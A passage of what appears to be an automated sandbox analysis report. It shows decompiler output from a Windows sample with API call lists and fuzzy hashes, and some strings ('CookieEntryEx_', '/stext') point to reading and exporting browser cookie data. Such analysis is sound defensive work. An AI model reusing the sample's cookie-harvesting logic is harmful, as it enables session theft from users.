                                                                                                                                                                    • API String ID: 3473537107-0
                                                                                                                                                                    • Opcode ID: 3f2537d69a83dbad711086520e7fd7dadb7db9e2dcff2647f4325042d9b9d9c7
                                                                                                                                                                    • Instruction ID: 1e085ebe6cf1454c0a13dd2dc3297af32645bfe8ec8fc95f9f4fc45ffd099028
                                                                                                                                                                    • Opcode Fuzzy Hash: 3f2537d69a83dbad711086520e7fd7dadb7db9e2dcff2647f4325042d9b9d9c7
                                                                                                                                                                    • Instruction Fuzzy Hash: 9B018032B04215ABCB299FE5DD4995BBFAAFB853907048036AC09EA360D770CD14CAD8
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                    			E0040562D(signed int* __eax, void* __edx, void** __edi, signed int _a4, char _a8) {
                                                                                                                                                                    				void* _t8;
                                                                                                                                                                    				void* _t13;
                                                                                                                                                                    				signed int _t16;
                                                                                                                                                                    				void** _t21;
                                                                                                                                                                    				signed int _t22;
                                                                                                                                                                    
                                                                                                                                                                    				_t21 = __edi;
                                                                                                                                                                    				_t22 =  *__eax;
                                                                                                                                                                    				if(__edx < _t22) {
                                                                                                                                                                    					return 0;
                                                                                                                                                                    				} else {
                                                                                                                                                                    					_t13 =  *__edi;
                                                                                                                                                                    					do {
                                                                                                                                                                    						_t1 =  &_a8; // 0x40655f
                                                                                                                                                                    						 *__eax =  *__eax +  *_t1;
                                                                                                                                                                    						_t16 =  *__eax;
                                                                                                                                                                    					} while (__edx >= _t16);
                                                                                                                                                                    					_t8 = malloc(_t16 * _a4); // executed
                                                                                                                                                                    					 *__edi = _t8;
                                                                                                                                                                    					if(_t22 > 0) {
                                                                                                                                                                    						if(_t8 != 0) {
                                                                                                                                                                    							memcpy(_t8, _t13, _t22 * _a4);
                                                                                                                                                                    						}
                                                                                                                                                                    						free(_t13); // executed
                                                                                                                                                                    					}
                                                                                                                                                                    					return 0 |  *_t21 != 0x00000000;
                                                                                                                                                                    				}
                                                                                                                                                                    			}








                                                                                                                                                                    APIs
                                                                                                                                                                    • malloc.MSVCRT ref: 00405649
                                                                                                                                                                    • memcpy.MSVCRT ref: 00405661
                                                                                                                                                                    • free.MSVCRT(00000000,00000000,?,00406343,00000002,?,00000000,?,0040655F,75144E00,?,00000000), ref: 0040566A
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: freemallocmemcpy
                                                                                                                                                                    • String ID: _e@
                                                                                                                                                                    • API String ID: 3056473165-4143410925
                                                                                                                                                                    • Opcode ID: 3078e6390c3b9a2d3984cf8c16c15fdfdd782231e9a83da3d75a0699d865d50d
                                                                                                                                                                    • Instruction ID: 65c1df984c8dd591618957182971b53504cae5b365517194d008c843f4823b23
                                                                                                                                                                    • Opcode Fuzzy Hash: 3078e6390c3b9a2d3984cf8c16c15fdfdd782231e9a83da3d75a0699d865d50d
                                                                                                                                                                    • Instruction Fuzzy Hash: 78F0E2B26052229FC718AB76B98184BB3ADEF443247504C3FF408E3281D7399C50CFA8
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 60%
                                                                                                                                                                    			E004061CD(FILETIME* __edi, signed int* __esi) {
                                                                                                                                                                    				struct _SYSTEMTIME _v20;
                                                                                                                                                                    				struct _SYSTEMTIME _v36;
                                                                                                                                                                    				int _t12;
                                                                                                                                                                    
                                                                                                                                                                    				if(__edi->dwHighDateTime != 0) {
                                                                                                                                                                    					FileTimeToSystemTime(__edi,  &_v20);
                                                                                                                                                                    					_t12 = SystemTimeToTzSpecificLocalTime(0,  &_v20,  &_v36); // executed
                                                                                                                                                                    					_push(__esi);
                                                                                                                                                                    					if(_t12 == 0) {
                                                                                                                                                                    						return FileTimeToLocalFileTime(__edi, ??);
                                                                                                                                                                    					} else {
                                                                                                                                                                    						SystemTimeToFileTime( &_v36, ??);
                                                                                                                                                                    						return 1;
                                                                                                                                                                    					}
                                                                                                                                                                    				} else {
                                                                                                                                                                    					 *__esi =  *__esi & 0x00000000;
                                                                                                                                                                    					__esi[1] = __esi[1] & 0x00000000;
                                                                                                                                                                    					return 0;
                                                                                                                                                                    				}
                                                                                                                                                                    			}






                                                                                                                                                                    APIs
                                                                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,00401DAD), ref: 004061E9
                                                                                                                                                                    • SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,00401DAD), ref: 004061F9
                                                                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00401DAD), ref: 00406208
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Time$System$File$LocalSpecific
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 979780441-0
                                                                                                                                                                    • Opcode ID: 7151ffe715f6e20ab243f245306c6cfdc10268265a47bf40f88944b89cde35d5
                                                                                                                                                                    • Instruction ID: ac9071ec82a3ebeda66c59c5f140a76e8f402871b7042997bc81315e07851fa8
                                                                                                                                                                    • Opcode Fuzzy Hash: 7151ffe715f6e20ab243f245306c6cfdc10268265a47bf40f88944b89cde35d5
                                                                                                                                                                    • Instruction Fuzzy Hash: 86F05E729101099BDB209BA0DD49BBBB3FCFB4470AF04443AE502E2080EB74D4088BA5
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 72%
                                                                                                                                                                    			E0040E490() {
                                                                                                                                                                    				intOrPtr _t1;
                                                                                                                                                                    				intOrPtr _t2;
                                                                                                                                                                    				intOrPtr _t3;
                                                                                                                                                                    				intOrPtr _t4;
                                                                                                                                                                    
                                                                                                                                                                    				_t1 =  *0x413270; // 0x2080048
                                                                                                                                                                    				if(_t1 != 0) {
                                                                                                                                                                    					_push(_t1); // executed
                                                                                                                                                                    					L0040E032(); // executed
                                                                                                                                                                    				}
                                                                                                                                                                    				_t2 =  *0x413278; // 0x8c70a0
                                                                                                                                                                    				if(_t2 != 0) {
                                                                                                                                                                    					_push(_t2);
                                                                                                                                                                    					L0040E032();
                                                                                                                                                                    				}
                                                                                                                                                                    				_t3 =  *0x413274; // 0x8c78b0
                                                                                                                                                                    				if(_t3 != 0) {
                                                                                                                                                                    					_push(_t3); // executed
                                                                                                                                                                    					L0040E032(); // executed
                                                                                                                                                                    				}
                                                                                                                                                                    				_t4 =  *0x41327c; // 0x8c74a8
                                                                                                                                                                    				if(_t4 != 0) {
                                                                                                                                                                    					_push(_t4); // executed
                                                                                                                                                                    					L0040E032(); // executed
                                                                                                                                                                    					return _t4;
                                                                                                                                                                    				}
                                                                                                                                                                    				return _t4;
                                                                                                                                                                    			}








                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ??3@
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 613200358-0
                                                                                                                                                                    • Opcode ID: b2228df5345cd7625d4464fd924bb73bf3a5cd492e4ab034a3356190575b741a
                                                                                                                                                                    • Instruction ID: b52db2e07b3ad488cd6e1e6deac71131c93cc09f27119b6233636937a2a2f9d5
                                                                                                                                                                    • Opcode Fuzzy Hash: b2228df5345cd7625d4464fd924bb73bf3a5cd492e4ab034a3356190575b741a
                                                                                                                                                                    • Instruction Fuzzy Hash: 65E01970300211A6DE28AA3BEC41A03238C3A003AA318CC7AF404F72E0CA7CE860882C
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                                                    			E0040BD40(void* __eax, void* __edx, void* __eflags) {
                                                                                                                                                                    				intOrPtr _v4;
                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                    				void* __edi;
                                                                                                                                                                    				void* __esi;
                                                                                                                                                                    				signed int _t33;
                                                                                                                                                                    				intOrPtr _t34;
                                                                                                                                                                    				signed int _t43;
                                                                                                                                                                    				intOrPtr _t54;
                                                                                                                                                                    				intOrPtr* _t55;
                                                                                                                                                                    				void* _t60;
                                                                                                                                                                    				void* _t61;
                                                                                                                                                                    				signed int _t65;
                                                                                                                                                                    				intOrPtr _t66;
                                                                                                                                                                    				void* _t71;
                                                                                                                                                                    
                                                                                                                                                                    				_t60 = __edx;
                                                                                                                                                                    				_t54 = 0;
                                                                                                                                                                    				_t61 = __eax;
                                                                                                                                                                    				_v4 = 0;
                                                                                                                                                                    				E00401EA3( *((intOrPtr*)(__eax + 0x69c)), __eflags, 0, 0);
                                                                                                                                                                    				 *((intOrPtr*)(_t61 + 0x208)) = 0;
                                                                                                                                                                    				_t71 = 0;
                                                                                                                                                                    				_v16 = 0;
                                                                                                                                                                    				if( *((intOrPtr*)( *((intOrPtr*)(_t61 + 0x6c0)) + 0x30)) - 1 <= 0) {
                                                                                                                                                                    					L18:
                                                                                                                                                                    					return _v4;
                                                                                                                                                                    				} else {
                                                                                                                                                                    					goto L1;
                                                                                                                                                                    				}
                                                                                                                                                                    				do {
                                                                                                                                                                    					L1:
                                                                                                                                                                    					_t33 =  *((intOrPtr*)(_t61 + 0x6c0));
                                                                                                                                                                    					if(_t54 >=  *((intOrPtr*)(_t33 + 0x30))) {
                                                                                                                                                                    						_t65 = 0x40f454;
                                                                                                                                                                    					} else {
                                                                                                                                                                    						_t33 = E00406306(_t33, _t54);
                                                                                                                                                                    						_t65 = _t33;
                                                                                                                                                                    					}
                                                                                                                                                                    					_push(_t65);
                                                                                                                                                                    					_push(L"/stext");
                                                                                                                                                                    					L0040E03E();
                                                                                                                                                                    					_pop(_t57);
                                                                                                                                                                    					if(_t33 != 0) {
                                                                                                                                                                    						_t34 = E0040BCAA(_t33, _t65);
                                                                                                                                                                    						__eflags = _t34;
                                                                                                                                                                    						if(_t34 <= 0) {
                                                                                                                                                                    							goto L8;
                                                                                                                                                                    						}
                                                                                                                                                                    						goto L7;
                                                                                                                                                                    					} else {
                                                                                                                                                                    						_t34 = _t33 + 1;
                                                                                                                                                                    						L7:
                                                                                                                                                                    						_v8 = _t34;
                                                                                                                                                                    						_t10 = _t54 + 1; // 0x2
                                                                                                                                                                    						_t71 = _t10;
                                                                                                                                                                    					}
                                                                                                                                                                    					L8:
                                                                                                                                                                    					_t54 = _t54 + 1;
                                                                                                                                                                    				} while (_t54 <  *((intOrPtr*)( *((intOrPtr*)(_t61 + 0x6c0)) + 0x30)) - 1);
                                                                                                                                                                    				_t66 = _v8;
                                                                                                                                                                    				if(_t66 > 0) {
                                                                                                                                                                    					E0040B147(_t61, _t57, 0); // executed
                                                                                                                                                                    					E0040A4C2(_t61);
                                                                                                                                                                    					_t42 =  *((intOrPtr*)(_t61 + 0x6c0));
                                                                                                                                                                    					if(_t71 >=  *((intOrPtr*)( *((intOrPtr*)(_t61 + 0x6c0)) + 0x30))) {
                                                                                                                                                                    						_t43 = 0x40f454;
                                                                                                                                                                    					} else {
                                                                                                                                                                    						_t57 = _t71;
                                                                                                                                                                    						_t43 = E00406306(_t42, _t71);
                                                                                                                                                                    					}
                                                                                                                                                                    					_t79 = _t66 - 8;
                                                                                                                                                                    					if(_t66 != 8) {
                                                                                                                                                                    						E004096FE( *((intOrPtr*)(_t61 + 0x69c)), _t60, __eflags, _t43, _t66); // executed
                                                                                                                                                                    					} else {
                                                                                                                                                                    						E0040ACA7(_t61, _t57, _t60, _t79, _t43, 0);
                                                                                                                                                                    					}
                                                                                                                                                                    					_t55 =  *((intOrPtr*)(_t61 + 0x69c));
                                                                                                                                                                    					_v4 = 1;
                                                                                                                                                                    					if(_t55 != 0) {
                                                                                                                                                                    						 *_t55 = 0x40f648;
                                                                                                                                                                    						 *((intOrPtr*)(_t55 + 0x34c)) = 0x40f6e0;
                                                                                                                                                                    						E00403F55(_t55 + 0xbf0);
                                                                                                                                                                    						E0040623E(_t55 + 0xbd0);
                                                                                                                                                                    						E0040623E(_t55 + 0xbac);
                                                                                                                                                                    						E00406355(_t55 + 0xb98);
                                                                                                                                                                    						 *((intOrPtr*)(_t55 + 0x34c)) = 0x40f948;
                                                                                                                                                                    						E00403FBE(_t55 + 0x350);
                                                                                                                                                                    						E004076F4(_t55);
                                                                                                                                                                    						_push(_t55);
                                                                                                                                                                    						L0040E032();
                                                                                                                                                                    					}
                                                                                                                                                                    				}
                                                                                                                                                                    				goto L18;
                                                                                                                                                                    			}



















                                                                                                                                                                    APIs
                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 0040BD9B
                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040BE86
                                                                                                                                                                      • Part of subcall function 0040BCAA: _wcsicmp.MSVCRT ref: 0040BCB0
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _wcsicmp$??3@
                                                                                                                                                                    • String ID: /stext
                                                                                                                                                                    • API String ID: 3682227554-3817206916
                                                                                                                                                                    • Opcode ID: e9a93c4c525a8eef83f821961eac4f0053dce98a787a6edb1d843895f468d4c2
                                                                                                                                                                    • Instruction ID: d8bbb9b930e80b6915cfb13594633440f620dbacd53bdbbf48f85004c8b902b2
                                                                                                                                                                    • Opcode Fuzzy Hash: e9a93c4c525a8eef83f821961eac4f0053dce98a787a6edb1d843895f468d4c2
                                                                                                                                                                    • Instruction Fuzzy Hash: CF31A6316002019BD710FE26D88169AB799FF40358F01057FFC09BB292CB7DA81987ED
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 81%
                                                                                                                                                                    			E00403EAC(void* __ecx, void* __edx, void* __edi) {
                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                    				void* __esi;
                                                                                                                                                                    				intOrPtr _t9;
                                                                                                                                                                    				void* _t14;
                                                                                                                                                                    				void* _t21;
                                                                                                                                                                    				void* _t22;
                                                                                                                                                                    				void* _t24;
                                                                                                                                                                    				WCHAR* _t27;
                                                                                                                                                                    				signed int _t28;
                                                                                                                                                                    				signed int _t29;
                                                                                                                                                                    
                                                                                                                                                                    				_t22 = __edi;
                                                                                                                                                                    				_t21 = __edx;
                                                                                                                                                                    				_t29 = _t28 & 0xfffffff8;
                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                    				_t9 = E004039F6(__edi); // executed
                                                                                                                                                                    				_t24 = 0;
                                                                                                                                                                    				_v8 = _t9;
                                                                                                                                                                    				if(_t9 != 0) {
                                                                                                                                                                    					L7:
                                                                                                                                                                    					return _v8;
                                                                                                                                                                    				}
                                                                                                                                                                    				if( *((intOrPtr*)(__edi + 0x42c)) <= 0) {
                                                                                                                                                                    					L5:
                                                                                                                                                                    					E0040405E(_t22 + 4);
                                                                                                                                                                    					_t27 = _t22 + 0x430;
                                                                                                                                                                    					if( *_t27 != 0) {
                                                                                                                                                                    						DeleteFileW(_t27); // executed
                                                                                                                                                                    						 *_t27 =  *_t27 & 0x00000000;
                                                                                                                                                                    					}
                                                                                                                                                                    					goto L7;
                                                                                                                                                                    				} else {
                                                                                                                                                                    					goto L2;
                                                                                                                                                                    				}
                                                                                                                                                                    				do {
                                                                                                                                                                    					L2:
                                                                                                                                                                    					_t14 = E00403F2B(_t24, _t22 + 0x420);
                                                                                                                                                                    					_push(0xe);
                                                                                                                                                                    					_t18 = _t14;
                                                                                                                                                                    					_push(L"CookieEntryEx_");
                                                                                                                                                                    					_push(_t14);
                                                                                                                                                                    					L0040E044();
                                                                                                                                                                    					_t29 = _t29 + 0xc;
                                                                                                                                                                    					if(_t14 == 0) {
                                                                                                                                                                    						E00403BAF(_t21, _t22, _t18); // executed
                                                                                                                                                                    					}
                                                                                                                                                                    					_t24 = _t24 + 1;
                                                                                                                                                                    				} while (_t24 <  *((intOrPtr*)(_t22 + 0x42c)));
                                                                                                                                                                    				goto L5;
                                                                                                                                                                    			}














                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 004039F6: memset.MSVCRT ref: 00403A36
                                                                                                                                                                      • Part of subcall function 004039F6: memset.MSVCRT ref: 00403A50
                                                                                                                                                                      • Part of subcall function 004039F6: wcslen.MSVCRT ref: 00403A68
                                                                                                                                                                      • Part of subcall function 004039F6: wcslen.MSVCRT ref: 00403A77
                                                                                                                                                                    • _wcsnicmp.MSVCRT ref: 00403EE6
                                                                                                                                                                      • Part of subcall function 00403BAF: memset.MSVCRT ref: 00403CCA
                                                                                                                                                                    • DeleteFileW.KERNELBASE(?), ref: 00403F17
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: memset$wcslen$DeleteFile_wcsnicmp
                                                                                                                                                                    • String ID: CookieEntryEx_
                                                                                                                                                                    • API String ID: 3258848388-47494461
                                                                                                                                                                    • Opcode ID: 66636eece1735f668a1aae4ed6bccc9c4179c0fd9ab6a026f0bbd4c75a5b9373
                                                                                                                                                                    • Instruction ID: 4f7492928af6ede5aa7db47b88c775c9002a426620b820d7d458ceab620e9f9d
                                                                                                                                                                    • Opcode Fuzzy Hash: 66636eece1735f668a1aae4ed6bccc9c4179c0fd9ab6a026f0bbd4c75a5b9373
                                                                                                                                                                    • Instruction Fuzzy Hash: DF01DBF1A10512AAC2146F25CC426ABF7ACFB04705F00463AF954B31C2E7B86E5187DD
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 83%
                                                                                                                                                                    			E00406785() {
                                                                                                                                                                    				void* _t25;
                                                                                                                                                                    				signed int _t27;
                                                                                                                                                                    				signed int _t28;
                                                                                                                                                                    				signed int _t29;
                                                                                                                                                                    				signed int _t30;
                                                                                                                                                                    				signed int _t31;
                                                                                                                                                                    				signed int _t32;
                                                                                                                                                                    				signed int _t33;
                                                                                                                                                                    				signed int _t50;
                                                                                                                                                                    				signed int _t52;
                                                                                                                                                                    				signed int _t54;
                                                                                                                                                                    				signed int _t56;
                                                                                                                                                                    				intOrPtr _t60;
                                                                                                                                                                    
                                                                                                                                                                    				_t60 =  *0x413288;
                                                                                                                                                                    				if(_t60 == 0) {
                                                                                                                                                                    					_t50 = 2;
                                                                                                                                                                    					 *0x413288 = 0x8000;
                                                                                                                                                                    					_t27 = 0x8000 * _t50;
                                                                                                                                                                    					 *0x41328c = 0x100;
                                                                                                                                                                    					 *0x413290 = 0x1000;
                                                                                                                                                                    					_push( ~(0 | _t60 > 0x00000000) | _t27); // executed
                                                                                                                                                                    					L0040E038(); // executed
                                                                                                                                                                    					 *0x413270 = _t27;
                                                                                                                                                                    					_t28 =  *0x41328c; // 0x100
                                                                                                                                                                    					_t52 = 4;
                                                                                                                                                                    					_t29 = _t28 * _t52;
                                                                                                                                                                    					_push( ~(0 | _t60 > 0x00000000) | _t29);
                                                                                                                                                                    					L0040E038();
                                                                                                                                                                    					 *0x413278 = _t29;
                                                                                                                                                                    					_t30 =  *0x41328c; // 0x100
                                                                                                                                                                    					_t54 = 4;
                                                                                                                                                                    					_t31 = _t30 * _t54;
                                                                                                                                                                    					_push( ~(0 | _t60 > 0x00000000) | _t31);
                                                                                                                                                                    					L0040E038();
                                                                                                                                                                    					 *0x41327c = _t31;
                                                                                                                                                                    					_t32 =  *0x413290; // 0x1000
                                                                                                                                                                    					_t56 = 2;
                                                                                                                                                                    					_t33 = _t32 * _t56;
                                                                                                                                                                    					_push( ~(0 | _t60 > 0x00000000) | _t33); // executed
                                                                                                                                                                    					L0040E038(); // executed
                                                                                                                                                                    					 *0x413274 = _t33;
                                                                                                                                                                    					return _t33;
                                                                                                                                                                    				}
                                                                                                                                                                    				return _t25;
                                                                                                                                                                    			}

















                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ??2@
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1033339047-0
                                                                                                                                                                    • Opcode ID: 8ab13f23862ced8c753b30d0abc2faf3e5d18bbc6e8aa25b2abc565fa32c18db
                                                                                                                                                                    • Instruction ID: 453b2fe8fef47dc3e01595af69639ea7307b60866b1d7e5282fab9a2940fa031
                                                                                                                                                                    • Opcode Fuzzy Hash: 8ab13f23862ced8c753b30d0abc2faf3e5d18bbc6e8aa25b2abc565fa32c18db
                                                                                                                                                                    • Instruction Fuzzy Hash: 830121B12422105EEB5CAF39ED0776A66D4A748345F40C5BFF106DE1F4EBB985448B08
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                    			E0040567E(WCHAR* __edi, WCHAR* _a4) {
                                                                                                                                                                    				short _v524;
                                                                                                                                                                    				WCHAR* _t12;
                                                                                                                                                                    
                                                                                                                                                                    				_t12 = __edi;
                                                                                                                                                                    				if(GetTempPathW(0x104,  &_v524) == 0) {
                                                                                                                                                                    					GetWindowsDirectoryW( &_v524, 0x104);
                                                                                                                                                                    				}
                                                                                                                                                                    				 *_t12 =  *_t12 & 0x00000000;
                                                                                                                                                                    				GetTempFileNameW( &_v524, _a4, 0, _t12); // executed
                                                                                                                                                                    				return _t12;
                                                                                                                                                                    			}






                                                                                                                                                                    APIs
                                                                                                                                                                    • GetTempPathW.KERNEL32(00000104,?), ref: 00405695
                                                                                                                                                                    • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004056A7
                                                                                                                                                                    • GetTempFileNameW.KERNELBASE(?,?,00000000,?), ref: 004056BE
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Temp$DirectoryFileNamePathWindows
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1125800050-0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 79%
                                                                                                                                                                    			E00404070(void** __esi, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                    				void* _t14;
                                                                                                                                                                    				void* _t15;
                                                                                                                                                                    
                                                                                                                                                                    				_t17 =  *(__esi[0x106] + 0xec);
                                                                                                                                                                    				_t11 = _a8 + 1;
                                                                                                                                                                    				_push(0);
                                                                                                                                                                    				SetFilePointerEx( *__esi, (_a8 + 1) *  *(__esi[0x106] + 0xec), _t11 * _t17 >> 0x20, 0); // executed
                                                                                                                                                                    				_t14 = E00405E43(_t15,  *__esi, _a4, _t17); // executed
                                                                                                                                                                    				return _t14;
                                                                                                                                                                    			}






                                                                                                                                                                    APIs
                                                                                                                                                                    • SetFilePointerEx.KERNELBASE(F@@,?,?,00000000,00000000,00000000,004046C5,00000000,00000000,?,00000000,F@@), ref: 0040408C
                                                                                                                                                                      • Part of subcall function 00405E43: ReadFile.KERNELBASE(?,?,?,00000000,00000000,?,?,0040400E,00000000,?,00000400,?,00000000,00403B9A,?), ref: 00405E5A
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File$PointerRead
                                                                                                                                                                    • String ID: F@@
                                                                                                                                                                    • API String ID: 3154509469-234039029
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 57%
                                                                                                                                                                    			E004096FE(intOrPtr* __eax, void* __edx, void* __eflags, short* _a4, intOrPtr _a8) {
                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                    				void* __ecx;
                                                                                                                                                                    				void* __edi;
                                                                                                                                                                    				void* __esi;
                                                                                                                                                                    				void* _t24;
                                                                                                                                                                    				intOrPtr _t34;
                                                                                                                                                                    				void* _t42;
                                                                                                                                                                    				void* _t44;
                                                                                                                                                                    				void* _t51;
                                                                                                                                                                    				signed int _t54;
                                                                                                                                                                    				intOrPtr* _t58;
                                                                                                                                                                    				void* _t62;
                                                                                                                                                                    
                                                                                                                                                                    				_t62 = __eflags;
                                                                                                                                                                    				_t51 = __edx;
                                                                                                                                                                    				_push(_t44);
                                                                                                                                                                    				_push(_t44);
                                                                                                                                                                    				_t54 = 0;
                                                                                                                                                                    				_t58 = __eax;
                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                    				E0040951A(__eax, _a8);
                                                                                                                                                                    				E00407A66(_t58, _t62);
                                                                                                                                                                    				_t23 = _a4;
                                                                                                                                                                    				if( *_a4 == 0) {
                                                                                                                                                                    					_t24 = GetStdHandle(0xfffffff5);
                                                                                                                                                                    				} else {
                                                                                                                                                                    					_t24 = E00405351(_t23);
                                                                                                                                                                    					_pop(_t44);
                                                                                                                                                                    				}
                                                                                                                                                                    				_t42 = _t24;
                                                                                                                                                                    				if(_t42 == 0xffffffff) {
                                                                                                                                                                    					__eflags = 0;
                                                                                                                                                                    					E004053B1(0, 0, _t54);
                                                                                                                                                                    				} else {
                                                                                                                                                                    					if( *((intOrPtr*)(_t58 + 0x24)) != _t54) {
                                                                                                                                                                    						if( *((intOrPtr*)(_t58 + 0x28)) == _t54) {
                                                                                                                                                                    							_push(2);
                                                                                                                                                                    							_push(0x40ff4c);
                                                                                                                                                                    						} else {
                                                                                                                                                                    							_push(3);
                                                                                                                                                                    							_push(0x40ff48);
                                                                                                                                                                    						}
